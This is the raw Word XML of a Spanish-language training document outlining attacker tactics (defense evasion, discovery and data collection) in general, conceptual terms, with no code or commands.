                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="3A626B8F" id="Group 49" o:spid="_x0000_s1058" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15736832;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">
                <v:shape id="Graphic 50" o:spid="_x0000_s1059"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 51" o:spid="_x0000_s1060"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23ADD4F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="391"/>
                          <w:ind w:left="1"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>Evasión defensiva</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="17050251" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="363695EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="483"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672256EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1148"/>
        </w:tabs>
        <w:ind w:left="1148" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La evasión defensiva se ocupa de evitar ser detectado durante todo el compromiso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6D93EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="321"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D085B3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1149"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1149" w:right="1038" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los atacantes eluden la detección ofuscando scripts maliciosos, escondiéndose en procesos de confianza y desactivando el software de seguridad, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA5EA03" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="340"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370F4198" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1149"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1149" w:right="1068" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La evasión defensiva se beneficia de la detección, pero está más relacionada con la comprensión de cómo un atacante puede evitar a los defensores de la red, ya sea a través de ciertos procesos o sabiendo qué herramientas de seguridad están en un sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F542927" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ABB9B34" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1148"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1148" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3DF228" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1869"/>
        </w:tabs>
        <w:spacing w:before="90" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1869" w:right="1953" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Debilitar las defensas</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">: Esto incluye la desactivación de los firewalls y las capacidades antivirus y de detección que los defensores pueden utilizar para auditar la actividad e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>identificar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>comportamientos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>maliciosos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457FC152"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0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="378" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512849FE"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7344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FB3647B" wp14:editId="0022A020">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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53" name="Graphic 53"/>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54" name="Textbox 54"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4180C402" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="391"/>
                                <w:ind w:left="1"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>Descubrimiento</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="5FB3647B" id="Group 52" o:spid="_x0000_s1061" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15737344;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">
                <v:shape id="Graphic 53" o:spid="_x0000_s1062"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 54" o:spid="_x0000_s1063"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180C402" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="391"/>
                          <w:ind w:left="1"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>Descubrimiento</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB81FF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA6DC9D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="483"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6A7017" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1148"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1148" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El atacante se dirige a la conciencia situacional donde intentan descifrar la organización</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5B0257" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1149"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>medio ambiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3775913B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="321"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3451652B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1149"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1149" w:right="1871" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Estas técnicas ayudan a los adversarios a observar el entorno y orientarse antes de decidir cómo actuar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A2E934" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="339"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D94DC6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1149"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1149" w:right="1242" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Esto ayuda mucho a recopilar el paradero y los activos críticos ubicados en la arquitectura de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188995A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="282"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713DD5CB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1148"/>
        </w:tabs>
        <w:ind w:left="1148" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3FAF33" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1869"/>
        </w:tabs>
        <w:spacing w:before="91" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1869" w:right="1675" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Detección de archivos y directorios </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: los atacantes enumeran archivos y directorios o pueden buscar en ubicaciones específicas de un host o recurso compartido de red cierta información dentro de un sistema de archivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62312B71"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0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="378" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135C67E5"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7856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B658C25" wp14:editId="11BE3AD7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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56" name="Graphic 56"/>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57" name="Textbox 57"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1E807129" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="391"/>
                                <w:ind w:left="4"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>Recogida de datos</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4B658C25" id="Group 55" o:spid="_x0000_s1064" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15737856;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">
                <v:shape id="Graphic 56" o:spid="_x0000_s1065"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 57" o:spid="_x0000_s1066"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E807129" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="391"/>
                          <w:ind w:left="4"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>Recogida de datos</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A6780" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393172E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3911630E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="402"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B11DBD6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1074"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1074" w:right="1234" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La recopilación de datos es el proceso de recopilación y medición de información del sistema establecido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B9316" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB66DA9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1073"/>
        </w:tabs>
        <w:ind w:left="1073" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los datos recopilados pueden ser cualquier información sensible presente en un sistema/red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A99CED9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="265"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
